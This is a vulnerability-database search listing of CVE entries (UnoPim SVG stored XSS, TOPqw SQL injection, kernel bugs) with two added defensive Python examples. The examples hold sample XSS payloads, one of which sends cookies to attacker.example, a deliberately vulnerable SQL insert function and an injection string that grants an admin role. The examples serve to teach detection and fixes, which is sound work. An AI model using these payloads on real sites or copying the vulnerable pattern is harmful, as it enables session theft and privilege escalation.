Lucene search

6045 matches found
NVD
added 2024/11/13 8:15 p.m., 29 views

CVE-2024-42834

A stored cross-site scripting (XSS) vulnerability in the Create Customer API in Incognito Service Activation Center (SAC) UI v14.11 allows authenticated attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the lastName parameter...

CVSS 5.4, EPSS 0.00466
Exploits 0, References 1
Snyk
added 2024/11/13 6:37 p.m., 2 views

Cross-site Scripting (XSS)

Overview Affected versions of this package are vulnerable to Cross-site Scripting (XSS) through the Create User process, which involves uploading a profile image. An attacker can exploit this by uploading a malicious SVG file containing a maliciously crafted script, which executes when the profile...

CVSS 7.3, AI score 5.3, EPSS 0.0018
Exploits 1, References 2
OSV
added 2024/11/13 6:37 p.m., 10 views

GHSA-CGR4-C233-H733 UnoPim Stored XSS : Cookie hijacking through Create User function

Summary A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an embedded script. When the profile image is accessed, the embedded script executes, leading to...

CVSS 7.3, AI score 5.6, EPSS 0.0018
Exploits 1, References 4
Github Security Blog
added 2024/11/13 6:37 p.m., 23 views

UnoPim Stored XSS : Cookie hijacking through Create User function

Summary A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an embedded script. When the profile image is accessed, the embedded script executes, leading to...

CVSS 6.5, AI score 6.3, EPSS 0.0018
Exploits 1, References 4, Affected Software 1
Vulnrichment
added 2024/11/13 3:20 p.m., 10 views

CVE-2024-52305 UnoPim Stored XSS : Cookie hijacking through Create User function

UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...

CVSS 6.5, AI score 6.7, EPSS 0.0018
Exploits 1, References 2
CVE
added 2024/11/13 3:20 p.m., 66 views

CVE-2024-52305

CVE-2024-52305 affects UnoPim (Laravel). The issue resides in the Create User flow, where uploading a profile image (notably SVG) can execute embedded scripts, enabling a stored XSS that can steal cookies and potentially hijack sessions. Affected versions include the UnoPim releases prior to the ...

CVSS 6.5, AI score 5.5, EPSS 0.0018
Exploits 1, References 2, Affected Software 1
Cvelist
added 2024/11/13 3:20 p.m., 32 views

CVE-2024-52305 UnoPim Stored XSS : Cookie hijacking through Create User function

UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...

CVSS 6.5, EPSS 0.0018
Exploits 1, References 2
OSV
added 2024/11/13 3:20 p.m., 21 views

CVE-2024-52305 UnoPim Stored XSS : Cookie hijacking through Create User function

UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...

CVSS 6.5, AI score 6.6, EPSS 0.0018
Exploits 1, References 4
Cvelist
added 2024/11/13 12:00 a.m., 16 views

CVE-2024-42834

A stored cross-site scripting (XSS) vulnerability in the Create Customer API in Incognito Service Activation Center (SAC) UI v14.11 allows authenticated attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the lastName parameter...

EPSS 0.00466
Exploits 0, References 1
CNNVD
added 2024/11/13 12:00 a.m., 3 views

baltic-it TOPqw Webportal security vulnerability

baltic-it TOPqw Webportal is a web application for social service providers from the German company baltic-it. It can be used to publicly view information about various facilities. A security vulnerability exists in baltic-it TOPqw Webportal version 1.35.287.1, which stems from a SQL...

CVSS 5.4, AI score 7.4, EPSS 0.00315
Exploits 0, References 2
Vulnrichment
added 2024/11/13 12:00 a.m., 17 views

CVE-2024-42834

A stored cross-site scripting (XSS) vulnerability in the Create Customer API in Incognito Service Activation Center (SAC) UI v14.11 allows authenticated attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the lastName parameter...

AI score 5.6, EPSS 0.00466
Exploits 0, References 1
Positive Technologies
added 2024/11/13 12:00 a.m., 4 views

PT-2024-28833 · Cybele · Thinfinity Workspace

Name of the Vulnerable Software and Affected Versions: Cybele Software Thinfinity Workspace versions prior to 7.0.2.113 Description: The issue is related to an access control problem in the Create Profile section, allowing attackers to create arbitrary user profiles with elevated privileges. This...

CVSS 7.3, AI score 7.2, EPSS 0.00271
Exploits 0, References 6
Positive Technologies
added 2024/11/13 12:00 a.m., 4 views

PT-2024-35166 · Unopim · Unopim

Name of the Vulnerable Software and Affected Versions: UnoPim versions prior to 0.1.5 Description: A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...

CVSS 6.9, AI score 7.2, EPSS 0.0018
Exploits 1, References 11
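The UnoPim entries above all describe one mechanism: a profile image is accepted as SVG, stored, and later rendered by the admin UI, so any script inside the file runs in the application's origin and can read session cookies. The following is an added example, not UnoPim's code, the project's fix, or the advisory's proof of concept: a Python allow-list check for uploaded SVGs plus response headers for serving a stored file. The element and attribute lists, the sample SVGs, the attacker hostname and the header values are the example's own constructions. The most robust fix for avatars is still to refuse SVG altogether or rasterize server-side; a sanitizer like this is a second line, not the whole answer.

```python
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# Added example, not UnoPim code. Element/attribute lists below are this example's
# own conservative choices; anything not clearly inert is rejected.
SVG_NS = "http://www.w3.org/2000/svg"
# Elements that execute script or embed arbitrary HTML/XML when an SVG renders inline.
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
# URL-carrying attributes (namespace prefix such as xlink: is stripped before matching).
URL_ATTRS = {"href", "src"}
SCRIPT_SCHEME = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)
CSS_LOADER = re.compile(r"url\s*\(|@import|expression\s*\(", re.IGNORECASE)


def _local(qname: str) -> str:
    """Strip ElementTree's '{namespace}' prefix and lowercase the local name."""
    return qname.rsplit("}", 1)[-1].lower()


def svg_is_safe(data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an uploaded SVG body."""
    lowered = data.lower()
    # Entity declarations are checked on the raw bytes, before any parser expands them.
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        return False, "DOCTYPE/ENTITY declarations are not allowed"
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, f"not well-formed XML: {exc}"
    if root.tag != f"{{{SVG_NS}}}svg":
        return False, "root element is not an SVG <svg>"
    for el in root.iter():
        tag = _local(el.tag)
        if tag in FORBIDDEN_ELEMENTS:
            return False, f"forbidden element <{tag}>"
        if tag == "style" and el.text and CSS_LOADER.search(el.text):
            return False, "<style> element loads external resources"
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):  # every SVG on* attribute is an event handler
                return False, f"event handler attribute {name!r} on <{tag}>"
            if name in URL_ATTRS and SCRIPT_SCHEME.match(value):
                return False, f"scripted URL in {name!r} on <{tag}>"
            if name == "style" and CSS_LOADER.search(value):
                return False, f"style attribute on <{tag}> loads external resources"
    return True, "ok"


def avatar_response_headers(filename: str) -> dict[str, str]:
    """Headers for serving a stored SVG so a missed payload still cannot reach cookies.
    Assumption: the UI embeds avatars via <img>, where scripts never run; these headers
    cover the case where the file URL is opened directly as a document."""
    safe_name = filename.replace('"', "").replace("\\", "")
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        # No script, no network, opaque origin: document.cookie is empty in a sandboxed page.
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
        # Direct navigation becomes a download; <img> embedding is unaffected.
        "Content-Disposition": f'attachment; filename="{safe_name}"',
    }


# Constructed samples for this example; not taken from the advisory.
SAMPLES = {
    "benign_circle": b'<svg xmlns="http://www.w3.org/2000/svg" width="32" height="32">'
                     b'<circle cx="16" cy="16" r="12" fill="#36c"/></svg>',
    "inline_script": b'<svg xmlns="http://www.w3.org/2000/svg">'
                     b'<script>fetch("https://attacker.example/?c=" + document.cookie)</script></svg>',
    "onload_handler": b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>',
    "javascript_link": b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
                       b'<a xlink:href="javascript:alert(1)"><text y="20">profile</text></a></svg>',
    "entity_expansion": b'<!DOCTYPE svg [<!ENTITY x "aaaa">]><svg xmlns="http://www.w3.org/2000/svg">&x;</svg>',
}


def check_samples() -> dict[str, bool]:
    """Run every constructed sample through the check; True means accepted."""
    return {name: svg_is_safe(data)[0] for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:18} -> {svg_is_safe(data)}")
```

Only the benign sample passes; the four payload shapes the advisories describe (inline script, event handler, scripted link, entity declaration) are each rejected for a stated reason, which is what you want in an upload audit log.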
BDU FSTEC
added 2024/11/13 12:00 a.m., 3 views

The vulnerability of the Create MyConfig (CMC) utility in Siemens Sinumerik programmable logic controllers allows a perpetrator to circumvent security restrictions and gain unauthorized access to protected information.

The vulnerability in the Create MyConfig (CMC) utility for Siemens Sinumerik programmable logic controllers stems from sensitive information being disclosed through log files. Exploiting this vulnerability can allow attackers to circumvent security restrictions and gain...

CVSS 5.5, AI score 5.5, EPSS 0.00155
Exploits 0, References 3, Affected Software 1
Vulnrichment
added 2024/11/13 12:00 a.m., 13 views

CVE-2024-40408

Cybele Software Thinfinity Workspace before v7.0.2.113 was discovered to contain an access control issue in the Create Profile section. This vulnerability allows attackers to create arbitrary user profiles with elevated privileges...

AI score 7.6, EPSS 0.00271
Exploits 0, References 1
CVE
added 2024/11/13 12:00 a.m., 54 views

CVE-2024-45875

The CVE concerns baltic-it TOPqw Webportal 1.35.287.1, with a fix in 1.35.291. The vulnerability exists in the create user function at /Apps/TOPqw/BenutzerManagement.aspx/SaveNewUser, where the JSON object username enables SQL query manipulation. This is a SQL injection in the user-creation path,...

CVSS 5.4, AI score 7.8, EPSS 0.00315
Exploits 0, References 1
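The SaveNewUser description above is the classic user-creation injection: the username field of the JSON body is spliced into the INSERT, so a value that closes the string literal can rewrite the rest of the statement. The following is an added example, not TOPqw's code (the product is ASP.NET and its schema is not on this page): a Python sqlite3 sketch of the vulnerable pattern next to the parameterised form and an input allow-list. The users table, the role column, the request body and the payload are all constructed for the example; the exact payload depends on the statement shape, but the fix does not.

```python
from __future__ import annotations

import re
import sqlite3

# Added example, not TOPqw code. Table layout and request shape are assumptions.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def new_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, role TEXT NOT NULL)"
    )
    return conn


def save_new_user_vulnerable(conn: sqlite3.Connection, body: dict) -> None:
    """Deliberately vulnerable: the JSON username is concatenated into the SQL text."""
    sql = "INSERT INTO users (username, role) VALUES ('%s', 'user')" % body["username"]
    conn.execute(sql)
    conn.commit()


def save_new_user_parameterised(conn: sqlite3.Connection, body: dict) -> None:
    """Bound parameter: the driver sends the username as data, never as SQL."""
    conn.execute("INSERT INTO users (username, role) VALUES (?, 'user')", (body["username"],))
    conn.commit()


def save_new_user_fixed(conn: sqlite3.Connection, body: dict) -> None:
    """Allow-list the field first, then bind it; rejects garbage before it reaches the DB."""
    username = body["username"]
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username must be 1-64 characters of [A-Za-z0-9._-]")
    save_new_user_parameterised(conn, {"username": username})


def roles(conn: sqlite3.Connection) -> dict[str, str]:
    return {u: r for u, r in conn.execute("SELECT username, role FROM users")}


# Constructed request body: closes the string and the VALUES list, picks a privileged
# role, and comments out the remainder of the original statement.
INJECTED_BODY = {"username": "eve', 'admin') --"}


def demo() -> dict:
    vuln = new_db()
    save_new_user_vulnerable(vuln, INJECTED_BODY)

    param = new_db()
    save_new_user_parameterised(param, INJECTED_BODY)

    fixed = new_db()
    save_new_user_fixed(fixed, {"username": "alice"})
    try:
        save_new_user_fixed(fixed, INJECTED_BODY)
        rejected = False
    except ValueError:
        rejected = True

    return {
        "vulnerable": roles(vuln),          # attacker-chosen role lands in the table
        "parameterised": roles(param),      # payload stored verbatim as a username, role 'user'
        "fixed": roles(fixed),              # only the well-formed name was accepted
        "fixed_rejected_payload": rejected,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:22} -> {v}")
```

The parameterised variant alone is enough to stop the injection; the allow-list is there because a username containing quotes and SQL comment markers is never legitimate input to a user-creation endpoint, and rejecting it gives you a cheap detection signal.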
OSV
added 2024/11/12 5:15 p.m., 2 views

CVE-2024-9842

Incorrect permissions in Ivanti Secure Access Client before version 22.7R4 allow a local authenticated attacker to create arbitrary folders...

CVSS 3.3, AI score 5.7, EPSS 0.0021
Exploits 0, References 1
RedHat Linux
added 2024/11/12 9:11 a.m., 4 views

kernel: net/mlx5e: fix a double-free in arfs_create_groups

A double-free vulnerability was found in the arfs_create_groups function in the Linux kernel's net/mlx5e driver. This issue could lead to memory corruption or a system crash if exploited, as freeing the same memory twice may cause undefined behavior...

CVSS 5.3, AI score 6.8, EPSS 0.00861
Exploits 0, References 5
SUSE CVE
added 2024/11/10 3:49 a.m., 2 views

SUSE CVE-2024-50243

In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix general protection fault in run_is_mapped_full. Fixed deleting of a non-resident attribute in ntfs_create_inode rollback...

CVSS 5.5, AI score 7.7, EPSS 0.00218
Exploits 0, References 5
OSV
added 2024/11/09 11:15 a.m., 1 view

DEBIAN-CVE-2024-50243

In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix general protection fault in run_is_mapped_full. Fixed deleting of a non-resident attribute in ntfs_create_inode rollback...

CVSS 5.5, AI score 5.7, EPSS 0.00218
Exploits 0, References 1